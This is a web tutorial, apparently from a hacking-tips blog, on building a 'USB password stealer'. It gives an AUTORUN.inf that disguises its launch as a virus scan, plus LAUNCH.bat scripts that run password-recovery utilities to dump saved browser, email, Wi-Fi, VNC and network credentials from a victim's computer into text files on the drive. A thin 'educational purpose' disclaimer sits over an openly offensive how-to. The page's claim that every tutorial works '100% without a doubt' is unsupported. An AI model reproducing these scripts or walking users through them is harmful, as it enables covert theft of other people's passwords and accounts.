USB stealer has never worked like this before. Make your own USB password stealer with our tutorial.
Warning: this method is only for educational purpose . I will not be held responsible and you are responsible yourself for every task you perform!
You might be seeing many cool hacking tricks in movies. Stealing data just by placing USB in the computer is one of the cool trick you might have seen. If you had dreamt of making such stealing device then you are at the right place where your dream will come true.
In this tutorial, for making USB password stealer or data stealer we will create a “bat” file at first and put a simple piece of code in our USB drive. After that we will download some .exe programme and put all of them on the USB drive. Let’s discuss them in detail
The requirement for creating USB stealer:
- USB drive(min-8gb)
- piece of code from us
Procedure to create USB password stealer:
Note: This is only for recovery purpose.
- First of all, open your notepad or Wordpad.
- (Note: This step is currently not needed) Copy and paste the code given below.
[autorun] open=launch.bat ACTION=perform a Virus Scan
3. Save the above statement as AUTORUN.inf and copy this in your USB.
4. Open a new notepad. copy and paste the statements given below
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start PasswordFox.exe /stext passwordfox.txt start OperaPassView.exe /stext OperaPassView.txt start ChromePass.exe /stext ChromePass.txt
5. Save as LAUNCH.bat and copy this file in your USB.
Optional: If you want to create more type of file stealer just copy and paste the statements given below and save as LAUNCH.bat
start Dialupass.exe /stext Dialupass.txt start netpass.exe /stexth netpass.txt start WirelessKeyView.exe /stext WirelessKeyView.txt start BulletsPassView.exe /stext BulletsPassView.txt start VNCPassView.exe /stext VNCPassView.txt start OpenedFilesView.exe /stext OpenedFilesView.txt start ProduKey.exe /stext ProduKey.txt start USBDeview.exe /stext USBDeview.txt
6. Now we need to download exe files mentioned in step 4 as “filename.exe”-e.g mspass.exe.
7. Go to this website and get the programs named in the step 4-link
8. Extract the files you downloaded to your desktop and copy all the .exe files to your USB.
9. Now your USB stealer or USB password stealer is ready to use.
How to use USB stealer?
- Remove and re-insert your USB
- Click on the bat file
- Go to my computer and locate your USB drive
- open it and now you will now see some text files. If you open them you will see usernames and passwords.
TIPS: You can also create mp4/mp3 files , PowerPoint document or other files stealer just by following the above procedures. You just need to change the exe file name and file type in the “LAUNCH.bat” file of step 4 and download the .exe programme of the stealer from the link given.
Every tutorial you find on this website is working 100% without a doubt. This is an authentic website. If you enjoy our tutorial please share us with your friends and support us. Stay updated for such awesome tips and tricks!